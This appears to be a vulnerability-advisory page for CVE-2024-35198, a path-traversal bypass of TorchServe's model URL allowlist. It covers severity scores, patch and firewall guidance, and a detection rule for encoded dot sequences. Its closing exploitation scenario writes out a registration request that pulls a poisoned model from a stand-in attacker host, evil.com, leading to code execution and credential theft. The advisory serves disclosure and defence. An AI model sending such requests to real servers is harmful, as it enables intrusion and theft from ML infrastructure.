CVE-2024-35198 — CRITICAL (CVSS 9.8) AI Security Vulnerability

CISO Take

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

Risk Assessment

Critical. CVSS 9.8 with no authentication, no user interaction, and network-accessible attack vector makes this trivially exploitable from the internet. The bypass is a simple URL manipulation technique requiring no AI/ML knowledge. TorchServe management APIs are frequently left exposed on internal networks or misconfigured cloud deployments, widening the blast radius. The core risk is not just model substitution but potential RCE through malicious model artifacts.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
torchserve	pip	—	No patch
99.8K OpenSSF 6.4 21.9K dependents Pushed today 8% patched ~142d to patch Full package profile →

Do you use torchserve? You're affected.

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 39% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

PATCH

Upgrade TorchServe to v0.11.0 or later — this is the only complete fix.
IMMEDIATE WORKAROUND

Restrict network access to TorchServe management API (port 8081) via firewall or security groups to trusted CI/CD and MLOps IP ranges only.
AUDIT

Inspect current model store for unexpected or recently-added models; compare against your approved model registry.
DETECT

Alert on model registration API calls (POST /models) originating from unexpected source IPs or containing URL-encoded dot sequences (%2E%2E, .., %252E).
HARDEN

Even post-patch, enforce network segmentation — management APIs should never be internet-facing.

CISA SSVC Assessment

Decision Track

Exploitation none

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Auth Bypass Supply Chain Code Execution Inference Framework AML.T0010.001 - AI Software AML.T0010.003 - Model AML.T0018.000 - Poison AI Model AML.T0018.002 - Embed Malware AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.1.4 - AI system resource and capability management A.9.3 - AI system integrity

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain the value of deployed AI

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-35198?

Any TorchServe deployment not running v0.11.0 can have its model allowlist completely circumvented — an unauthenticated attacker can load any model from any URL by injecting '..' characters. Upgrade to 0.11.0 immediately; if blocked, firewall the management API (default port 8081) to trusted IPs only. AWS SageMaker and EKS users are not affected.

Is CVE-2024-35198 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-35198, increasing the risk of exploitation.

How to fix CVE-2024-35198?

1. PATCH: Upgrade TorchServe to v0.11.0 or later — this is the only complete fix. 2. IMMEDIATE WORKAROUND: Restrict network access to TorchServe management API (port 8081) via firewall or security groups to trusted CI/CD and MLOps IP ranges only. 3. AUDIT: Inspect current model store for unexpected or recently-added models; compare against your approved model registry. 4. DETECT: Alert on model registration API calls (POST /models) originating from unexpected source IPs or containing URL-encoded dot sequences (%2E%2E, .., %252E). 5. HARDEN: Even post-patch, enforce network segmentation — management APIs should never be internet-facing.

What systems are affected by CVE-2024-35198?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps pipelines, inference infrastructure, training pipelines.

What is the CVSS score for CVE-2024-35198?

CVE-2024-35198 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.18%.

Technical Details

NVD Description

TorchServe is a flexible and easy-to-use tool for serving and scaling PyTorch models in production. TorchServe 's check on allowed_urls configuration can be by-passed if the URL contains characters such as ".." but it does not prevent the model from being downloaded into the model store. Once a file is downloaded, it can be referenced without providing a URL the second time, which effectively bypasses the allowed_urls security check. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and EKS are not affected. This issue in TorchServe has been fixed by validating the URL without characters such as ".." before downloading see PR #3082. TorchServe release 0.11.0 includes the fix to address this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Exploitation Scenario

An attacker targeting an organization's ML inference infrastructure sends a POST request to TorchServe's management API: 'POST /models?url=https://evil.com/../allowed-partner.com/poisoned_resnet.mar'. The URL validation checks the allowlist against the raw string but does not normalize the path, so 'allowed-partner.com' appears in the URL and passes the check. TorchServe downloads the model from evil.com into the local model store. The attacker then triggers inference via 'POST /predictions/poisoned_resnet' — no URL required this time since the model is cached locally. The malicious MAR file executes arbitrary code during deserialization, establishing persistence or exfiltrating credentials from the ML worker process.